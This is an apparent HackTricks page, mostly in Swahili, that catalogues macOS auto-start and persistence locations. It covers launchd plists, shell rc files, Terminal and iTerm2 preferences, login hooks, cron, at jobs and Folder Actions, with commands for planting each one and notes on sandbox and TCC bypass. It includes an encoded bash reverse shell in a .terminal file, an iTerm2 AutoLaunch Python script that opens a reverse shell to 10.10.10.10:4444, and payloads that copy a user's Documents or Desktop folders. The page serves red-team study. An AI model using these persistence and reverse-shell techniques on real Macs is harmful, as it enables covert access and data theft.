macOS Auto Start | HackTricks

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Sehemu hii inategemea sana mfululizo wa blogu Beyond the good ol' LaunchAgents, lengo ni kuongeza Mahali zaidi pa Kuanzisha (ikiwa inawezekana), kuonyesha mbinu zipi bado zinafanya kazi leo na toleo jipya la macOS (13.4) na kubainisha idhini zinazohitajika.

Sandbox Bypass

Hapa unaweza kupata mahali pa kuanzisha yanayofaa kwa sandbox bypass ambayo inakuwezesha kutekeleza kitu kwa urahisi kwa kuliandika kwenye faili na kusubiri kwa kitendo cha kawaida, muda ulioamuliwa au kitendo ambacho unaweza kawaida kufanya kutoka ndani ya sandbox bila kuhitaji ruhusa za mzizi.

Launchd

Inafaida kwa kupita sandbox: ✅
TCC Bypass: 🔴

Locations

/Library/LaunchAgents
Trigger: Reboot
Inahitaji mzizi
/Library/LaunchDaemons
Trigger: Reboot
Inahitaji mzizi
/System/Library/LaunchAgents
Trigger: Reboot
Inahitaji mzizi
/System/Library/LaunchDaemons
Trigger: Reboot
Inahitaji mzizi
~/Library/LaunchAgents
Trigger: Relog-in
~/Library/LaunchDemons
Trigger: Relog-in

Kama ukweli wa kuvutia, launchd ina orodha ya mali iliyojumuishwa katika sehemu ya Mach-o __Text.__config ambayo ina huduma nyingine maarufu ambazo launchd inapaswa kuanzisha. Zaidi ya hayo, huduma hizi zinaweza kuwa na RequireSuccess, RequireRun na RebootOnSuccess ambayo inamaanisha kwamba lazima zitekelezwe na kukamilika kwa mafanikio.

Kwa kweli, haiwezi kubadilishwa kwa sababu ya saini ya msimbo.

Description & Exploitation

launchd ni mchakato wa kwanza unaotekelezwa na OX S kernel wakati wa kuanzisha na wa mwisho kumaliza wakati wa kuzima. Inapaswa kuwa na PID 1 kila wakati. Mchakato huu uta soma na kutekeleza mipangilio iliyoonyeshwa katika ASEP plists katika:

/Library/LaunchAgents: Wakala wa mtumiaji waliowekwa na msimamizi
/Library/LaunchDaemons: Daemons za mfumo mzima zilizowekwa na msimamizi
/System/Library/LaunchAgents: Wakala wa mtumiaji waliotolewa na Apple.
/System/Library/LaunchDaemons: Daemons za mfumo mzima zilizotolewa na Apple.

Wakati mtumiaji anapoingia, plists zilizoko katika /Users/$USER/Library/LaunchAgents na /Users/$USER/Library/LaunchDemons zinaanzishwa kwa idhini za watumiaji walioingia.

Tofauti kuu kati ya wakala na daemons ni kwamba wakala huwekwa wakati mtumiaji anaingia na daemons huwekwa wakati wa kuanzisha mfumo (kama kuna huduma kama ssh ambazo zinahitaji kutekelezwa kabla ya mtumiaji yeyote kuingia kwenye mfumo). Pia wakala wanaweza kutumia GUI wakati daemons zinahitaji kukimbia katika hali ya nyuma.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.someidentifier</string>
<key>ProgramArguments</key>
<array>
<string>bash -c 'touch /tmp/launched'</string> <!--Prog to execute-->
</array>
<key>RunAtLoad</key><true/> <!--Execute at system startup-->
<key>StartInterval</key>
<integer>800</integer> <!--Execute each 800s-->
<key>KeepAlive</key>
<dict>
<key>SuccessfulExit</key></false> <!--Re-execute if exit unsuccessful-->
<!--If previous is true, then re-execute in successful exit-->
</dict>
</dict>
</plist>

Kuna kesi ambapo wakala anahitaji kutekelezwa kabla ya mtumiaji kuingia, hawa huitwa PreLoginAgents. Kwa mfano, hii ni muhimu kutoa teknolojia ya msaada wakati wa kuingia. Wanaweza kupatikana pia katika /Library/LaunchAgents (angalia hapa mfano).

Faili mpya za usanidi za Daemons au Agents zita pakuliwa baada ya kuanzisha tena au kutumia launchctl load <target.plist> Pia inawezekana kupakua faili za .plist bila kiambishi hicho kwa kutumia launchctl -F <file> (hata hivyo hizo faili za plist hazitapakiwa kiotomatiki baada ya kuanzisha tena). Pia inawezekana kufuta kwa kutumia launchctl unload <target.plist> (mchakato unaoonyeshwa na hiyo utaondolewa),

Ili kuhakikisha kwamba hakuna kitu (kama vile kubadilisha) kinachozuia Agent au Daemon kufanya kazi endesha: sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist

Orodhesha wote wakala na daemons walio pakuliwa na mtumiaji wa sasa:

launchctl list

Ikiwa plist inamilikiwa na mtumiaji, hata ikiwa iko katika folda za mfumo wa daemon, kazi itatekelezwa kama mtumiaji na si kama root. Hii inaweza kuzuia baadhi ya mashambulizi ya kupandisha mamlaka.

Maelezo zaidi kuhusu launchd

launchd ni mchakato wa kwanza wa hali ya mtumiaji ambao huanzishwa kutoka kernel. Kuanzishwa kwa mchakato lazima kuwa na mafanikio na hakuwezi kutoka au kuanguka. Hata hivyo, imekingwa dhidi ya baadhi ya ishara za kuua.

Moja ya mambo ya kwanza launchd itakayofanya ni kuanzisha daemons zote kama:

Daemons za Timer zinazotegemea wakati wa kutekelezwa:
atd (com.apple.atrun.plist): Ina StartInterval ya dakika 30
crond (com.apple.systemstats.daily.plist): Ina StartCalendarInterval kuanzisha saa 00:15
Daemons za Mtandao kama:
org.cups.cups-lpd: Inasikiliza katika TCP (SockType: stream) na SockServiceName: printer
SockServiceName lazima iwe bandari au huduma kutoka /etc/services
com.apple.xscertd.plist: Inasikiliza kwenye TCP katika bandari 1640
Daemons za Njia ambazo zinafanywa wakati njia maalum inabadilika:
com.apple.postfix.master: Inakagua njia /etc/postfix/aliases
Daemons za Arifa za IOKit:
com.apple.xartstorageremoted: "com.apple.iokit.matching" => { "com.apple.device-attach" => { "IOMatchLaunchStream" => 1 ...
Bandari ya Mach:
com.apple.xscertd-helper.plist: Inaonyesha katika kiingilio cha MachServices jina com.apple.xscertd.helper
UserEventAgent:
Hii ni tofauti na ile ya awali. Inafanya launchd kuanzisha programu kama majibu ya tukio maalum. Hata hivyo, katika kesi hii, binary kuu inayohusika si launchd bali /usr/libexec/UserEventAgent. Inapakia plugins kutoka folda iliyozuiwa ya SIP /System/Library/UserEventPlugins/ ambapo kila plugin inaonyesha mchakato wake wa kuanzisha katika ufunguo wa XPCEventModuleInitializer au, katika kesi ya plugins za zamani, katika kamusi ya CFPluginFactories chini ya ufunguo FB86416D-6164-2070-726F-70735C216EC0 wa Info.plist yake.

faili za kuanzisha shell

Andiko: https://theevilbit.github.io/beyond/beyond_0001/ Andiko (xterm): https://theevilbit.github.io/beyond/beyond_0018/

Inafaida kubypass sandbox: ✅
TCC Bypass: ✅
Lakini unahitaji kupata programu yenye TCC bypass inayotekeleza shell inayopakia faili hizi

Mahali

~/.zshrc, ~/.zlogin, ~/.zshenv.zwc, ~/.zshenv, ~/.zprofile
Kichocheo: Fungua terminal na zsh
/etc/zshenv, /etc/zprofile, /etc/zshrc, /etc/zlogin
Kichocheo: Fungua terminal na zsh
Inahitajika root
~/.zlogout
Kichocheo: Toka kwenye terminal na zsh
/etc/zlogout
Kichocheo: Toka kwenye terminal na zsh
Inahitajika root
Huenda kuna zaidi katika: man zsh
~/.bashrc
Kichocheo: Fungua terminal na bash
/etc/profile (haikufanya kazi)
~/.profile (haikufanya kazi)
~/.xinitrc, ~/.xserverrc, /opt/X11/etc/X11/xinit/xinitrc.d/
Kichocheo: Inatarajiwa kuanzisha na xterm, lakini haijasanidiwa na hata baada ya kusanidiwa kosa hili linatolewa: xterm: DISPLAY is not set

Maelezo & Ukatili

Wakati wa kuanzisha mazingira ya shell kama zsh au bash, faili fulani za kuanzisha zinafanywa. macOS kwa sasa inatumia /bin/zsh kama shell ya default. Shell hii inapatikana moja kwa moja wakati programu ya Terminal inapoanzishwa au wakati kifaa kinapofikiwa kupitia SSH. Ingawa bash na sh pia zipo katika macOS, zinahitaji kuitwa wazi ili kutumika.

Ukurasa wa mtu wa zsh, ambao tunaweza kusoma kwa man zsh una maelezo marefu ya faili za kuanzisha.

# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc

Re-opened Applications

Kuweka mipangilio ya unyakuzi na kuingia na kutoka au hata kuanzisha upya hakufanikiwa kwangu kutekeleza programu hiyo. (Programu hiyo haikuwa ikitekelezwa, labda inahitaji kuwa inafanya kazi wakati hatua hizi zinapofanywa)

Writeup: https://theevilbit.github.io/beyond/beyond_0021/

Inasaidia kupita sandbox: ✅
TCC bypass: 🔴

Location

~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist
Trigger: Anzisha upya kufungua programu

Description & Exploitation

Programu zote za kufungua tena ziko ndani ya plist ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Hivyo, ili kufanya programu za kufungua tena zianzishe yako, unahitaji tu kuongeza programu yako kwenye orodha.

UUID inaweza kupatikana kwa kuorodhesha hiyo directory au kwa ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'

Ili kuangalia programu ambazo zitafunguliwa tena unaweza kufanya:

defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Ili kuongeza programu kwenye orodha hii unaweza kutumia:

# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist

Terminal Preferences

Inatumika kubypass sandbox: ✅
TCC bypass: ✅
Terminal inatumika kuwa na ruhusa za FDA za mtumiaji anayetumia

Location

~/Library/Preferences/com.apple.Terminal.plist
Trigger: Fungua Terminal

Description & Exploitation

Katika ~/Library/Preferences zinahifadhiwa mapendeleo ya mtumiaji katika Programu. Baadhi ya mapendeleo haya yanaweza kuwa na usanidi wa kutekeleza programu/scripts nyingine.

Kwa mfano, Terminal inaweza kutekeleza amri katika Startup:

Usanidi huu unajitokeza katika faili ~/Library/Preferences/com.apple.Terminal.plist kama ifuatavyo:

[...]
"Window Settings" => {
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
[...]

Hivyo, ikiwa plist ya mapendeleo ya terminal katika mfumo inaweza kuandikwa upya, basi open kazi inaweza kutumika kufungua terminal na amri hiyo itatekelezwa.

Unaweza kuongeza hii kutoka kwa cli na:

# Add
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist

# Remove
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist

Terminal Scripts / Other file extensions

Inasaidia kupita sandbox: ✅
Kupita TCC: ✅
Matumizi ya Terminal yana FDA ruhusa za mtumiaji anayezitumia

Location

Popote
Trigger: Fungua Terminal

Description & Exploitation

Ikiwa unaunda .terminal script na kufungua, programu ya Terminal itaitwa moja kwa moja kutekeleza amri zilizoonyeshwa humo. Ikiwa programu ya Terminal ina ruhusa maalum (kama TCC), amri yako itatekelezwa kwa ruhusa hizo maalum.

Jaribu na:

# Prepare the payload
cat > /tmp/test.terminal << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CommandString</key>
<string>mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;</string>
<key>ProfileCurrentVersion</key>
<real>2.0600000000000001</real>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>exploit</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
EOF

# Trigger it
open /tmp/test.terminal

# Use something like the following for a reverse shell:
<string>echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;</string>

You could also use the extensions .command, .tool, with regular shell scripts content and they will be also opened by Terminal.

Ikiwa terminal ina Full Disk Access itakuwa na uwezo wa kukamilisha hiyo hatua (kumbuka kwamba amri iliyotekelezwa itaonekana kwenye dirisha la terminal).

Audio Plugins

Writeup: https://theevilbit.github.io/beyond/beyond_0013/ Writeup: https://posts.specterops.io/audio-unit-plug-ins-896d3434a882

Inatumika kupita sandbox: ✅
TCC bypass: 🟠
Unaweza kupata ufikiaji wa ziada wa TCC

Location

/Library/Audio/Plug-Ins/HAL
Inahitaji root
Trigger: Restart coreaudiod au kompyuta
/Library/Audio/Plug-ins/Components
Inahitaji root
Trigger: Restart coreaudiod au kompyuta
~/Library/Audio/Plug-ins/Components
Trigger: Restart coreaudiod au kompyuta
/System/Library/Components
Inahitaji root
Trigger: Restart coreaudiod au kompyuta

Description

Kulingana na maandiko ya awali inawezekana kukusanya baadhi ya plugins za sauti na kuzipakia.

QuickLook Plugins

Writeup: https://theevilbit.github.io/beyond/beyond_0028/

Inatumika kupita sandbox: ✅
TCC bypass: 🟠
Unaweza kupata ufikiaji wa ziada wa TCC

Location

/System/Library/QuickLook
/Library/QuickLook
~/Library/QuickLook
/Applications/AppNameHere/Contents/Library/QuickLook/
~/Applications/AppNameHere/Contents/Library/QuickLook/

Description & Exploitation

QuickLook plugins zinaweza kutekelezwa unapofanya kuchochea muonekano wa faili (bonyeza nafasi na faili iliyo chaguliwa kwenye Finder) na plugin inayounga mkono aina hiyo ya faili imewekwa.

Inawezekana kukusanya plugin yako ya QuickLook, kuiweka katika moja ya maeneo ya awali ili kuipakia na kisha kwenda kwenye faili inayounga mkono na kubonyeza nafasi ili kuichochea.

Hii haikufanya kazi kwangu, wala kwa LoginHook ya mtumiaji wala LogoutHook ya root

Writeup: https://theevilbit.github.io/beyond/beyond_0022/

Inatumika kupita sandbox: ✅
TCC bypass: 🔴

Location

Unahitaji kuwa na uwezo wa kutekeleza kitu kama defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
Lokated katika ~/Library/Preferences/com.apple.loginwindow.plist

Zimeondolewa lakini zinaweza kutumika kutekeleza amri wakati mtumiaji anapoingia.

cat > $HOME/hook.sh << EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh

Hali hii inahifadhiwa katika /Users/$USER/Library/Preferences/com.apple.loginwindow.plist

defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
}

Ili kuifuta:

defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook

The root user one is stored in /private/var/root/Library/Preferences/com.apple.loginwindow.plist

Conditional Sandbox Bypass

Hapa unaweza kupata maeneo ya kuanzisha yanayofaa kwa sandbox bypass ambayo inakuwezesha kutekeleza kitu kwa kuliandika kwenye faili na kutegemea hali zisizo za kawaida kama programu maalum zilizowekwa, hatua za mtumiaji "zisizo za kawaida" au mazingira.

Cron

Writeup: https://theevilbit.github.io/beyond/beyond_0004/

Inafaida kwa bypass sandbox: ✅
Hata hivyo, unahitaji kuwa na uwezo wa kutekeleza crontab binary
Au uwe root
TCC bypass: 🔴

Location

/usr/lib/cron/tabs/, /private/var/at/tabs, /private/var/at/jobs, /etc/periodic/
Root inahitajika kwa ufikiaji wa moja kwa moja wa kuandika. Hakuna root inahitajika ikiwa unaweza kutekeleza crontab <file>
Trigger: Inategemea kazi ya cron

Description & Exploitation

Orodhesha kazi za cron za mtumiaji wa sasa na:

crontab -l

You can also see all the cron jobs of the users in /usr/lib/cron/tabs/ and /var/at/tabs/ (needs root).

Katika MacOS, folda kadhaa zinazotekeleza skripti kwa mara fulani zinaweza kupatikana katika:

# The one with the cron jobs is /usr/lib/cron/tabs/
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/

Hapo unaweza kupata cron jobs za kawaida, at jobs (hazitumiki sana) na periodic jobs (zinatumika hasa kwa kusafisha faili za muda). Periodic za kila siku zinaweza kutekelezwa kwa mfano na: periodic daily.

Ili kuongeza user cronjob programatically inawezekana kutumia:

echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron

iTerm2

Writeup: https://theevilbit.github.io/beyond/beyond_0002/

Inatumika kupita sandbox: ✅
TCC bypass: ✅
iTerm2 ilikuwa na ruhusa za TCC zilizotolewa

Locations

~/Library/Application Support/iTerm2/Scripts/AutoLaunch
Trigger: Fungua iTerm
~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt
Trigger: Fungua iTerm
~/Library/Preferences/com.googlecode.iterm2.plist
Trigger: Fungua iTerm

Description & Exploitation

Scripts zilizohifadhiwa katika ~/Library/Application Support/iTerm2/Scripts/AutoLaunch zitatekelezwa. Kwa mfano:

cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF

chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"

au:

cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF
#!/usr/bin/env python3
import iterm2,socket,subprocess,os

async def main(connection):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
async with iterm2.CustomControlSequenceMonitor(
connection, "shared-secret", r'^create-window$') as mon:
while True:
match = await mon.async_get()
await iterm2.Window.async_create(connection)

iterm2.run_forever(main)
EOF

Skiripti ~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt pia litatekelezwa:

do shell script "touch /tmp/iterm2-autolaunchscpt"

Mipangilio ya iTerm2 iliyoko ~/Library/Preferences/com.googlecode.iterm2.plist inaweza kuonyesha amri ya kutekeleza wakati terminal ya iTerm2 inafunguliwa.

Mipangilio hii inaweza kuwekewa mipangilio katika mipangilio ya iTerm2:

Na amri inaonyeshwa katika mipangilio:

plutil -p com.googlecode.iterm2.plist
{
[...]
"New Bookmarks" => [
0 => {
[...]
"Initial Text" => "touch /tmp/iterm-start-command"

Unaweza kuweka amri ya kutekeleza na:

# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist

# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2

# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist

Inawezekana kubwa kuna njia nyingine za kutumia vibaya mipangilio ya iTerm2 ili kutekeleza amri zisizo na mipaka.

xbar

Writeup: https://theevilbit.github.io/beyond/beyond_0007/

Inasaidia kupita sandbox: ✅
Lakini xbar lazima iwe imewekwa
TCC bypass: ✅
Inahitaji ruhusa za Uwezo

Mahali

~/Library/Application\ Support/xbar/plugins/
Kichocheo: Mara xbar inapotekelezwa

Maelezo

Ikiwa programu maarufu xbar imewekwa, inawezekana kuandika script ya shell katika ~/Library/Application\ Support/xbar/plugins/ ambayo itatekelezwa wakati xbar inapoanzishwa:

cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"

Hammerspoon

Writeup: https://theevilbit.github.io/beyond/beyond_0008/

Inatumika kupita sandbox: ✅
Lakini Hammerspoon lazima iwe imewekwa
TCC bypass: ✅
Inahitaji ruhusa za Accessibility

Location

~/.hammerspoon/init.lua
Trigger: Mara Hammerspoon inapotekelezwa

Description

Hammerspoon inatumika kama jukwaa la automatisering kwa macOS, ikitumia LUA scripting language kwa shughuli zake. Kwa hakika, inasaidia uunganisho wa msimbo kamili wa AppleScript na utekelezaji wa scripts za shell, ikiongeza uwezo wake wa scripting kwa kiasi kikubwa.

App inatafuta faili moja, ~/.hammerspoon/init.lua, na inapozinduliwa script itatekelezwa.

mkdir -p "$HOME/.hammerspoon"
cat > "$HOME/.hammerspoon/init.lua" << EOF
hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
EOF

BetterTouchTool

Inatumika kubypass sandbox: ✅
Lakini BetterTouchTool lazima iwe imewekwa
TCC bypass: ✅
Inahitaji ruhusa za Automation-Shortcuts na Accessibility

Location

~/Library/Application Support/BetterTouchTool/*

Chombo hiki kinaruhusu kuashiria programu au scripts za kutekeleza wakati baadhi ya shortcuts zinapobanwa. Mshambuliaji anaweza kuweza kuunda shortcut na hatua za kutekeleza katika database ili kufanya itekeleze msimbo wa kiholela (shortcut inaweza kuwa kubonyeza tu funguo).

Alfred

Inatumika kubypass sandbox: ✅
Lakini Alfred lazima iwe imewekwa
TCC bypass: ✅
Inahitaji ruhusa za Automation, Accessibility na hata Full-Disk access

Location

???

Inaruhusu kuunda workflows ambazo zinaweza kutekeleza msimbo wakati masharti fulani yanatimizwa. Inawezekana kwa mshambuliaji kuunda faili ya workflow na kumfanya Alfred aifanye (inahitajika kulipa toleo la premium ili kutumia workflows).

SSHRC

Writeup: https://theevilbit.github.io/beyond/beyond_0006/

Inatumika kubypass sandbox: ✅
Lakini ssh inahitaji kuwezeshwa na kutumika
TCC bypass: ✅
SSH inahitaji kuwa na FDA access

Location

~/.ssh/rc
Trigger: Ingia kupitia ssh
/etc/ssh/sshrc
Inahitaji root
Trigger: Ingia kupitia ssh

Kuwezesha ssh kunahitaji Full Disk Access:

sudo systemsetup -setremotelogin on

Maelezo & Ukatili

Kwa kawaida, isipokuwa PermitUserRC no katika /etc/ssh/sshd_config, wakati mtumiaji anapoingia kupitia SSH skripti /etc/ssh/sshrc na ~/.ssh/rc zitatekelezwa.

Vitu vya Kuingia

Andiko: https://theevilbit.github.io/beyond/beyond_0003/

Inafaida kubypass sandbox: ✅
Lakini unahitaji kutekeleza osascript na args
TCC bypass: 🔴

Mahali

~/Library/Application Support/com.apple.backgroundtaskmanagementagent
Kichocheo: Kuingia
Payload ya ukatili inahifadhiwa ikitumia osascript
/var/db/com.apple.xpc.launchd/loginitems.501.plist
Kichocheo: Kuingia
Mzizi unahitajika

Maelezo

Katika Mipangilio ya Mfumo -> Watumiaji & Makundi -> Vitu vya Kuingia unaweza kupata vitu vitakavyotekelezwa wakati mtumiaji anapoingia. Inawezekana kuorodhesha, kuongeza na kuondoa kutoka kwa mstari wa amri:

#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'

#Add an item:
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'

#Remove an item:
osascript -e 'tell application "System Events" to delete login item "itemname"'

These items are stored in the file ~/Library/Application Support/com.apple.backgroundtaskmanagementagent

Vitu vya kuingia vinaweza pia kuonyeshwa kwa kutumia API SMLoginItemSetEnabled ambayo itahifadhi usanidi katika /var/db/com.apple.xpc.launchd/loginitems.501.plist

ZIP kama Kitu cha Kuingia

(Tazama sehemu ya awali kuhusu Vitu vya Kuingia, hii ni nyongeza)

Ikiwa unahifadhi faili ya ZIP kama Kitu cha Kuingia, Archive Utility itafungua na ikiwa zip ilikuwa kwa mfano imehifadhiwa katika ~/Library na ilikuwa na Folda LaunchAgents/file.plist yenye backdoor, folda hiyo itaundwa (sio kwa kawaida) na plist itaongezwa ili wakati mtumiaji atakaporudi kuingia tena, backdoor iliyoonyeshwa katika plist itatekelezwa.

Chaguo lingine lingekuwa kuunda faili .bash_profile na .zshenv ndani ya HOME ya mtumiaji ili ikiwa folda ya LaunchAgents tayari ipo, mbinu hii bado itafanya kazi.

At

Writeup: https://theevilbit.github.io/beyond/beyond_0014/

Inasaidia kupita sandbox: ✅
Lakini unahitaji kutekeleza at na lazima iwe imewezeshwa
TCC bypass: 🔴

Mahali

Unahitaji kutekeleza at na lazima iwe imewezeshwa

Maelezo

at kazi zimeundwa kwa ajili ya kuandaa kazi za mara moja kutekelezwa kwa nyakati fulani. Tofauti na kazi za cron, kazi za at zinaondolewa kiotomatiki baada ya kutekelezwa. Ni muhimu kutambua kwamba kazi hizi ni za kudumu wakati wa upya wa mfumo, na kuziweka kama wasiwasi wa usalama chini ya hali fulani.

Kwa kawaida zime zimezuiliwa lakini mtumiaji root anaweza kuziwezesha hizi kwa:

sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist

Hii itaunda faili ndani ya saa 1:

echo "echo 11 > /tmp/at.txt" | at now+1

Angalia foleni ya kazi kwa kutumia atq:

sh-3.2# atq
26	Tue Apr 27 00:46:00 2021
22	Wed Apr 28 00:29:00 2021

Juu tunaweza kuona kazi mbili zilizopangwa. Tunaweza kuchapisha maelezo ya kazi kwa kutumia at -c JOBNUMBER

sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
echo 'Execution directory inaccessible' >&2
exit 1
}
unset OLDPWD
echo 11 > /tmp/at.txt

Ikiwa kazi za AT hazijawashwa, kazi zilizoundwa hazitatekelezwa.

The job files can be found at /private/var/at/jobs/

sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r--  1 root  wheel    6 Apr 27 00:46 .SEQ
-rw-------  1 root  wheel    0 Apr 26 23:17 .lockfile
-r--------  1 root  wheel  803 Apr 27 00:46 a00019019bdcd2
-rwx------  1 root  wheel  803 Apr 27 00:46 a0001a019bdcd2

The filename contains the queue, the job number, and the time it’s scheduled to run. For example let’s take a loot at a0001a019bdcd2.

a - hii ni foleni
0001a - nambari ya kazi katika hex, 0x1a = 26
019bdcd2 - muda katika hex. Inawakilisha dakika zilizopita tangu epoch. 0x019bdcd2 ni 26991826 katika desimali. Ikiwa tutazidisha kwa 60 tunapata 1619509560, ambayo ni GMT: 2021. Aprili 27., Jumanne 7:46:00.

If we print the job file, we find that it contains the same information we got using at -c.

Folder Actions

Writeup: https://theevilbit.github.io/beyond/beyond_0024/ Writeup: https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d

Inatumika kupita sandbox: ✅
Lakini unahitaji kuwa na uwezo wa kuita osascript na hoja ili kuwasiliana na System Events ili uweze kuunda Folder Actions
TCC bypass: 🟠
Ina ruhusa za msingi za TCC kama Desktop, Documents na Downloads

Location

/Library/Scripts/Folder Action Scripts
Msingi unahitajika
Trigger: Ufikiaji wa folda iliyoainishwa
~/Library/Scripts/Folder Action Scripts
Trigger: Ufikiaji wa folda iliyoainishwa

Description & Exploitation

Folder Actions ni scripts zinazozinduliwa kiotomatiki na mabadiliko katika folda kama kuongeza, kuondoa vitu, au vitendo vingine kama kufungua au kubadilisha ukubwa wa dirisha la folda. Vitendo hivi vinaweza kutumika kwa kazi mbalimbali, na vinaweza kuzinduliwa kwa njia tofauti kama kutumia UI ya Finder au amri za terminal.

Ili kuanzisha Folder Actions, una chaguzi kama:

Kuunda mchakato wa Folder Action na Automator na kuisakinisha kama huduma.
Kuunganisha script kwa mikono kupitia Folder Actions Setup katika menyu ya muktadha ya folda.
Kutumia OSAScript kutuma ujumbe wa Apple Event kwa System Events.app kwa kuanzisha Folder Action kwa njia ya programu.

Njia hii ni muhimu sana kwa kuingiza kitendo ndani ya mfumo, ikitoa kiwango cha kudumu.

The following script is an example of what can be executed by a Folder Action:

// source.js
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");

Ili kufanya script hapo juu iweze kutumika na Folder Actions, itengeneze kwa kutumia:

osacompile -l JavaScript -o folder.scpt source.js

